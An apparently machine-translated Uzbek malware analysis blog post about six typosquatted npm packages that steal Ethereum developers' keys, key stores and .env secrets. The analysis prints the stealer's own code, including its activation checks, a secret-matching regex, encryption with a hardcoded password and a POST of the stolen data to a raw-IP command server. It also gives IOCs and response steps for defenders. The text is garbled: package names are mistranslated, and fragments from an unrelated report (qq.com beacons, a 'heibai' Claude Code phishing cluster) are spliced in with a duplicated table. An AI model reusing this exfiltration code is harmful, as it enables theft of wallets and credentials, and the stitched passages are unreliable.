EVMDeFi npm Typosquatting hujumi dasturchi kalitlarini o'g'irlaydi

EVM/DeFi npm Typosquatting hujumi dasturchi kalitlarini o'g'irlaydi

TP; DR

2026-yil 6-may kuni bitta npm nashriyotchisi, namikazesarada010206, Ethereum, Solidity va DeFi ishlab chiquvchilar ekotizimiga qaratilgan oltita zararli paketni tarqatdi.

Paketlar, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utilsva web3-utils-core, mashhur Web3 vositalari uchun yordamchi kutubxonalarga o'xshab ko'rinishga mo'ljallangan ishonchli nomlardan foydalangan.

Oltita paketning barchasida bir xil narsa bor edi telemetry.js fayl. Fayl klaster bo'ylab bayt jihatidan bir xil edi, SHA-256 bilan:

SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

Zararli dastur o'rnatish vaqtida ishga tushmaydi. Yo'q preinstall or postinstall Buning o'rniga, u paket import qilinganda faollashadi require().

Bu tafsilot muhim.

Implant ishlab chiquvchi paketdan haqiqatan ham foydalanguncha kutadi. Keyin u ish stantsiyasining haqiqiy Ethereum / Solidity ishlab chiqish muhitiga o'xshashligini tekshiradi. U Alchemy yoki Infura kalitlarini, shaxsiy kalitlarni, mnemonikalarni, tarqatuvchi kalitlarni yoki mahalliy Foundry katalogini qidiradi.

Agar xost mos kelsa, o'g'irlovchi SSH shaxsiy kalitlarini, Foundry / Geth / Brownie hamyon kalit do'konlarini to'playdi, .env* fayllar va sezgir muhit o'zgaruvchilari. U paketni qattiq kodlangan parol yordamida AES-256-GCM bilan shifrlaydi va TLS tekshiruvi o'chirilgan holda uni xom IPv4 C2 so'nggi nuqtasiga chiqaradi.

Xygeni’ning zararli dasturlarni erta ogohlantirish (MEW) tizimi oltita paketning barchasini zararli deb tasdiqladi. npm registrini olib tashlash hisoboti toʻplami kutilmoqda.

Klaster: Oltita paket, bitta nashriyotchi

Nashriyotchi hisobi namikazesarada010206 tasdiqlanmagan Gmail manziliga bog'langan edi namikazesarada010206@gmail.com.

Kampaniya 2026-yil 6-may kuni bir kunlik nashr sifatida paydo bo'ldi. Oltita paketning barchasi quyidagicha versiyalangan edi 1.0.0, ish vaqtiga bog'liqlik yo'q edi va faqat uchta faylni jo'natdi:

package.json index.js telemetry.js

Ular shuningdek, bir xil manba omborini e'lon qilishdi:

https://github.com/harunosakura030303-maker/evmchain-config

Dastlabki uchta paket MEW skanerlari tomonidan birinchi nashrda aniqlandi. Qolgan uchtasi nashriyotchining npm profilini tahlilchilar tomonidan ko'rib chiqilgandan so'ng majburiy ravishda belgilandi. Bir marta bir xil bayt-bir xil telemetry.js klaster bo'ylab tasdiqlangan bo'lsa-da, ular izchillik bilan zararli deb yopildi.

To'plam Version npm nashr etildi MEW chiptasi hukm
viem-yadrosi 1.0.0 2026-05-06 01:38:44Z #51049 Zararli
viem-utils-core 1.0.0 2026-05-06 #51050 Zararli
hardhat-core-utils 1.0.0 2026-05-06 #51051 Zararli
evm-utils 1.0.0 2026-05-06 #51069 Yomon niyatli, izchillik bilan
quyish ustaxonalari 1.0.0 2026-05-06 #51071 Yomon niyatli, izchillik bilan
web3-utils-core 1.0.0 2026-05-06 #51070 Yomon niyatli, izchillik bilan

Nomlash strategiyasi sodda, ammo samarali.

Bu paketlar aniq yuqori oqim nomlarini taqlid qilmaydi. Buning o'rniga ular ishonchli "foydali" qo'shimchalaridan foydalanadilar, masalan, -core, -utilsva -utils-coreBu ularni ishlab chiquvchi Web3 vositalari yonida ko'rishni kutadigan hamroh kutubxonalarga o'xshatadi.

Zararli paket Qonuniy nishon
viem-yadrosi viem, mashhur Ethereum TypeScript mijozi
viem-utils-core viem
hardhat-core-utils qattiq shlyapa, asosiy oqimdagi Solidity ishlab chiqish muhiti
evm-utils Umumiy EVM asboblar maydoni
quyish ustaxonalari quyish sexi, Solidity asboblar zanjiri
web3-utils-core web3-utils, Web3.js yordamchilari

Bu "qo'shimcha paket" naqshidir: "Men haqiqiy paketman" emas, balki "Men haqiqiy paket atrofida oqilona yordamchiga o'xshayman".

Tez harakatlanayotgan DeFi ishlab chiquvchilari uchun bu xavf tug'dirish uchun yetarli.

Paket import qilinganda nima bo'ladi

Hujum zanjiri kichik, qasddan tuzilgan va kripto-ishlab chiqish muhitlariga qaratilgan.

O'rnatish ilgagi yo'q. Buning o'rniga, har bir paket quyidagilarni o'z ichiga oladi index.js stub funksiyasini eksport qiladi va keyin zararli telemetriya modulini yuklaydi.

require('./telemetry').init();

Bu shuni anglatadiki, zararli dastur birinchi importda faollashadi.

Bu tajovuzkor uchun operatsion jihatdan foydalidir. Ko'pgina skanerlar va sinov muhitlari o'rnatish vaqtidagi xatti-harakatlarga e'tibor qaratadi. Ushbu paket aslida ishlab chiquvchi, tuzish skripti, sinov to'plami yoki ish vaqti yo'li tomonidan ishlatilguncha kutadi.

Faollashtirish darvozasi: Faqat haqiqiy Web3 dasturchi ish stantsiyalarida o't oching

Implantning eng muhim qismi aktivatsiya eshigi hisoblanadi.

Zararli dastur Ethereum / Solidity ishlab chiquvchi mashinalarida keng tarqalgan muhit o'zgaruvchilarini tekshiradi:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

Shuningdek, u Foundry o'rnatilgan ko'rinadi yoki yo'qligini tekshiradi:

fs.existsSync(path.join(os.homedir(), '.foundry'))

Agar ikkala shart ham to'g'ri bo'lmasa, funksiya qaytadi va hech narsa qilmaydi.

Bu umumiy tahlil muhitida paketni jimroq qiladi. Foundry, Alchemy kalitlari, Infura kalitlari, shaxsiy kalitlar yoki mnemonikalarsiz sinov muhiti zararsiz ko'rinishga ega bo'lishi mumkin.

Mos keladigan xostda zararli dastur ma'lumotlarni to'plashdan oldin 60 dan 90 soniyagacha kutadi:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

Kechikish import va ekfiltratsiya o'rtasidagi aniq bog'liqlikni kamaytiradi. .unref() call shuningdek, agar paket qisqa muddatli skriptda import qilingan bo'lsa, xost jarayonining normal ishlashiga imkon beradi.

Bu shovqinli tarzda "urish va tortib olish" harakati emas. Bu ishlab chiquvchi muhiti o'g'irlashga arziydigan bo'lmasa, ishga tushmaslik uchun mo'ljallangan maqsadli o'g'irlashdir.

O'g'ri nimani to'playdi

Aktivizatsiya eshigidan o'tgandan so'ng, zararli dastur Web3 ishlab chiqishda eng muhim manbalardan to'planadi: shaxsiy kalitlar, hamyon kalitlari do'konlari, joylashtirish ma'lumotlari, bulut sirlari, npm tokenlari va mahalliy loyiha konfiguratsiyasi.

manba Nima to'plangan
process.env /TOKEN|SECRET|KEY|PASS|AVTORIZATSIYA|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i ga mos keladigan har qanday o'zgaruvchi
~/.ssh/* PRIVATE KEY yoki BEGIN OPENSSH fayllari, jumladan, to'liq fayl mazmuni
~/.quyma sexi/kalit do'konlari/* Foundry hamyon kalit do'koni fayllari
~/.ethereum/keystore/* Geth hamyon kalit do'koni fayllari
~/.braunie/akkauntlar/* Brownie hamyon kalit do'koni fayllari
${cwd}/.env To'liq fayl mazmuni
${cwd}/.env.local To'liq fayl mazmuni
${cwd}/.env.production To'liq fayl mazmuni
${cwd}/.env.development To'liq fayl mazmuni
os.hostname() Xost meta-fayllari
crypto.randomUUID() Jabrlanuvchi/sessiya identifikatori
Sana.hozir() To'plam vaqt tamg'asi
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

ATTA tokenlari quyidagilar:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

Telemetriya operatorning o'z tahlili yoki alohida monetizatsiya qilingan kanal ekanligini tasdiqlay olmadik. Biz tekshirgan ikkala namunada ham ATTA tokenlari bir xil.

B klasteri: heibai

claude.hk OAuth фишинги + ANTHROPIC_BASE_URL Hijack

1-aprel namunasi kampaniyaning eng qo'pol, avvalgi qismidir.

heibai:2.1.88-claude.hk-4 tomonidan nashr etilgan wuguoqiangvip28, 2025-yil 7-iyunda yaratilgan akkaunt. Paket o'zini qonuniy versiyaga qarshi aniq ko'rsatdi. 2.1.88 Antropik ozod qilish.

Bu CA-certificate MITM bilan bog'liq emas. Buning o'rniga, u foydalanuvchiga OAuth so'nggi nuqtasi haqida yolg'on gapiradi.

Sirlangan Claude Code manbasining ustiga qo'yilgan zararli qo'shimchalar quyidagilarni o'z ichiga oladi:

manba Nima to'plangan
process.env /TOKEN|SECRET|KEY|PASS|AVTORIZATSIYA|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i ga mos keladigan har qanday o'zgaruvchi
~/.ssh/* PRIVATE KEY yoki BEGIN OPENSSH fayllari, jumladan, to'liq fayl mazmuni
~/.quyma sexi/kalit do'konlari/* Foundry hamyon kalit do'koni fayllari
~/.ethereum/keystore/* Geth hamyon kalit do'koni fayllari
~/.braunie/akkauntlar/* Brownie hamyon kalit do'koni fayllari
${cwd}/.env To'liq fayl mazmuni
${cwd}/.env.local To'liq fayl mazmuni
${cwd}/.env.production To'liq fayl mazmuni
${cwd}/.env.development To'liq fayl mazmuni
os.hostname() Xost meta-fayllari
crypto.randomUUID() Jabrlanuvchi/sessiya identifikatori
Sana.hozir() To'plam vaqt tamg'asi

Maqsadli ro'yxat juda aniq. Bu umumiy brauzer o'g'irlanishi yoki keng ko'lamli hisob ma'lumotlarini qirib olish emas. U Ethereum ilovalarini yaratadigan, sinovdan o'tkazadigan, joylashtiradigan yoki boshqaradigan dasturchilarga qaratilgan.

Foundry, Geth va Brownie kalit do'konlarini kiritish ayniqsa muhimdir. Ushbu fayllar hamyonlarga yoki joylashtirish identifikatorlariga to'g'ridan-to'g'ri kirishni anglatishi mumkin. Agar tajovuzkor ularni parollar, mnemonika yoki atrof-muhit sirlari bilan bog'lay olsa, ular mablag'larni ko'chirishi, joylashtirishchilarni taqlid qilishi yoki aqlli shartnoma operatsiyalarini buzishi mumkin.

Eksfiltratsiyadan oldin shifrlash

Zararli dastur to'plangan ma'lumotlarni yuborishdan oldin shifrlaydi.

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

Qattiq kodlangan parol:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

Yakuniy yuklama JSON sifatida o'ralgan:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

Shifrlash o'z-o'zidan zararli dasturni yanada rivojlantirmaydi. Biroq, bu tarmoq tekshiruvini qiyinlashtiradi. Chiqishni kuzatayotgan himoyachi JSON yuklamasini ko'radi, lekin o'g'irlangan kalitlarni, hamyon fayllarini yoki .env qattiq kodlangan parol va shifrni ochish mantig'isiz tarkib.

Xom IPv4 C2 ga eksfiltratsiya

Eksfiltratsiya yo'li qattiq kodlangan:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

Zararli dastur ma'lumotlarni quyidagi manzilga yuboradi:

https://76.13.37.80:8443/api/v1/telemetry

Ikkita tafsilot ajralib turadi.

Birinchidan, C2 domen emas, balki xom IPv4 manzilidir. Bu domenni ro'yxatdan o'tkazish zaruratini bartaraf etadi va domenga asoslangan ba'zi aniqlashlarning oldini oladi.

Ikkinchidan, TLS tekshiruvi quyidagilar bilan o'chirib qo'yilgan:

rejectUnauthorized: false

Bu zararli dasturga o'z-o'zidan imzolangan sertifikatlarni ham qo'shib hisoblaganda, har qanday sertifikatni qabul qilish imkonini beradi. Boshqacha qilib aytganda, tajovuzkor haqiqiy ochiq sertifikatga ehtiyoj sezmasdan shifrlangan transportni oladi.

Qayta urinish mantig'i va zaxira xost yo'q. Xatolar jimgina yutib yuboriladi. Bu C2 oflayn yoki unga ulanib bo'lmaydigan bo'lsa, paketni jim saqlaydi.

Nima uchun bu kampaniya muhim

Ishlab chiquvchilarga qaratilgan zararli npm paketlarining aksariyati keng ko'lamli ma'lumotlarni ta'qib qiladi: npm tokenlari, AWS kalitlari, GitHub tokenlari yoki .npmrc fayllar.

Bu kampaniya maqsadni toraytiradi.

U mashinaning Ethereum yoki Solidity ishlab chiqaruvchisiga tegishli ekanligining belgilarini qidiradi. Keyin u aynan shu muhitda muhim bo'lgan aktivlarni oladi: hamyon kalit do'konlari, shaxsiy kalitlar, mnemonika, tarqatuvchi kalitlar, .env fayllar va SSH kalitlari.

Bu kampaniyani Web3 jamoalari uchun oddiy npm o'g'irlashdan ko'ra xavfliroq qiladi.

Muvaffaqiyatli infeksiya quyidagilarni keltirib chiqarishi mumkin:

  • Joylashtirish hamyonlari
  • Aqlli shartnoma boshqaruv kalitlari
  • RPC provayder kalitlari
  • Bulutni joylashtirish ma'lumotlari
  • npm nashriyot tokenlari
  • Ishlab chiquvchiga yoki infratuzilmani yaratishga SSH orqali kirish
  • Loyiha sirlari saqlangan .env fayllar
  • Foundry, Geth yoki Brownie uchun hamyon kalit do'konlari

Paket nomlari ham aniq ijtimoiy muhandislikni ko'rsatadi. Ular tanish vosita nomlari orqali Web3 ishlab chiquvchi ekotizimiga qaratilgan: viem, hardhat, foundry, evmva web3.

Aktyor haqiqiy loyihalardan voz kechishi shart emas. Ularga faqat o'rtacha darajadagi hamrohlik paketiga o'xshash narsani o'rnatish uchun dasturchi kerak.

Murosaga kelish va aniqlash ko'rsatkichlari

Paketlar va nashriyotchi
dala qiymati
npm nashriyotchisi namikazesarada010206
Nashriyotchi elektron pochtasi namikazesarada010206@gmail.com
elektron pochta tasdiqlandi Yo'q
SCM tasdiqlangan Yo'q
Obro'-e'tibor ballari 1.0
paketlar viem-core, viem-utils-core, hardhat-core-utils, evm-utils, dökümhane-utils, web3-utils-core
versiyalari Barcha 1.0.0
Manba ombori https://github.com/harunosakura030303-maker/evmchain-config
Zararli ekanligi tasdiqlandi Barcha oltita paket
tarmoq
Shrift qiymati
C2 tugash nuqtasi https://76.13.37.80:8443/api/v1/telemetry
C2 IP 76.13.37.80
C2 porti 8443/tsp
TLS xatti-harakati rad etish Ruxsatsiz: noto'g'ri
Yuk ko'tarish sxemasi {"v":2,"iv": "d": "t": }
Fayllar va xeshlar
Shrift qiymati
telemetry.js SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
Paket joylashuvi package.json, index.js, telemetry.js
Fayllar soni 3
Taxminiy umumiy hajmi 3.4 KB

Faollashtirish signallari

Zararli dastur ushbu muhit o'zgaruvchilarini tekshiradi:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

Shuningdek, u quyidagilarni tekshiradi:

~/.foundry/

Maqsadli xost yo'llari

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

To'plam Regex

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

Aniqlash bo'yicha eslatmalar

To'liq xulq-atvor tahliliga ehtiyoj sezmasdan, bir nechta qoidalar ushbu kampaniyani ushlaydi.

Birinchidan, oltita zararli paket nomlari uchun qulflangan fayllarni skanerlang:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

Har qanday moslik package-lock.json, yarn.lock, pnpm-lock.yamlyoki node_modules tarix jiddiy voqea sifatida qaralishi kerak.

Ikkinchidan, hamyon kalit do'koni yo'llarini o'qiydigan Node.js jarayonlarini kuzatib boring:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

Bu yordamchi qaramlik sifatida import qilingan paket uchun kamdan-kam hollarda qonuniy xatti-harakatlardir. Bu, ayniqsa, chiquvchi tarmoq faoliyati kuzatilganda shubhali bo'ladi.

Uchinchidan, HTTPS ulanishlarini bloklash yoki ogohlantirish:

76.13.37.80:8443

Ayniqsa, so'rov yo'li quyidagicha bo'lsa:

/api/v1/telemetry

To'rtinchidan, ushbu xususiyatlarni birlashtirgan npm paketlarini qidiring:

  • Yangi yoki obro'si past bo'lgan nashriyotchi
  • Tasdiqlanmagan Gmail hisobi
  • Web3 qo'shni paket nomi
  • Mazmunli ombor tarixi yo'q
  • Kichik paket tartibi
  • index.js telemetriya yoki yordamchi faylni yuklaydi
  • Ish vaqtiga bog'liqlik yo'q
  • Sezgir muhit o'zgaruvchilari to'plami
  • Hamyon kalit do'koniga kirish

Bu naqsh bitta IOCga qaraganda foydaliroq, chunki keyingi paket IP manzilini o'zgartirishi mumkin, ammo bir xil maqsadli mantiqni saqlab qoladi.

Kompromissga javob berish nazorat ro'yxati

Agar ishlab chiquvchi oltita paketdan birini ishlatgan bo'lsa va ularning muhiti faollashtirish eshigiga mos kelgan bo'lsa, ish stantsiyasini buzilgan deb hisoblang.

Bunga Foundry o'rnatilgan mashinalar, muhitdagi Alchemy yoki Infura kalitlari, shaxsiy kalitlar, mnemonika yoki tarqatuvchi kalitlari kiradi.

Tavsiya etilgan javob:

  • Xostni tarmoqdan uzing.
  • Saqlash node_modules, qulflangan fayllar, qobiq tarixi va sud ekspertizasi uchun tegishli jurnallar.
  • Har bir SSH tugmachasini pastga aylantiring ~/.ssh/.
  • Har bir kalit do'koni uchun hamyon kalitlarini aylantiring ~/.foundry, ~/.ethereumva ~/.brownie.
  • Mablag'larni yangi hamyonlarga o'tkazing.
  • Saqlangan har bir sirni aylantiring .env* Ishlab chiquvchi ishlagan omborlardagi fayllar.
  • AWS kalitlari, npm tokenlari, joylashtirish tokenlari, API kalitlari, shaxsiy kalitlar, urug'lar va mnemonika kabi to'plam regexiga mos keladigan muhit sirlarini aylantiring.
  • Paket birinchi marta o'rnatilgandan beri bulut, npm, GitHub, RPC provayderi va blokcheyn faoliyatini audit qilish.
  • Qayta ishlatishdan oldin ish stantsiyasini qayta tasvirlang.

Himoyachilar nimani olib ketishlari kerak

Ushbu kampaniya npm typosquatting yuqori qiymatli ishlab chiquvchi ekotizimlari atrofida qanday rivojlanayotganini ko'rsatadi.

Aktyorga qat'iyat kerak emas edi. Ularga chalkashlik kerak emas edi. Ular hatto o'rnatish vaqtida bajarilishiga ham ehtiyoj sezmadilar.

Buning o'rniga ular uchta narsaga tayanishdi:

  • Ishonchli Web3 paket nomlari
  • Faqat haqiqiy kripto-ishlab chiqish mashinalarida faollashtirish
  • Ethereum ishlab chiquvchilari uchun eng muhim bo'lgan fayllar va sirlarni to'g'ridan-to'g'ri o'g'irlash

Bu kampaniyani keng ko'lamli skanerlashda o'tkazib yuborishni osonlashtiradi va to'g'ri muhitga tushganda xavfli bo'ladi.

Web3 jamoalari uchun saboq aniq: qaramlik nomlarini tahdid modelingizning bir qismi sifatida ko'rib chiqing. Zararsiz yordamchiga o'xshagan paket baribir hamyonni buzishning eng qisqa yo'liga aylanishi mumkin.

npm registriga xabar berildi. Nashriyotchi hisobi va paketlar olib tashlanganida biz ushbu xabarni yangilaymiz.

sca-vositalari-dasturiy ta'minot-kompozitsiya-tahlil-vositalari
Dasturiy ta'minot xavflaringizni ustuvorlashtiring, bartaraf eting va himoya qiling
Bepul hisobingizni oling.
Kredit karta talab qilinmaydi.

Dasturiy ta'minotingizni ishlab chiqish va yetkazib berishni ta'minlang

Xygeni mahsulot to'plami bilan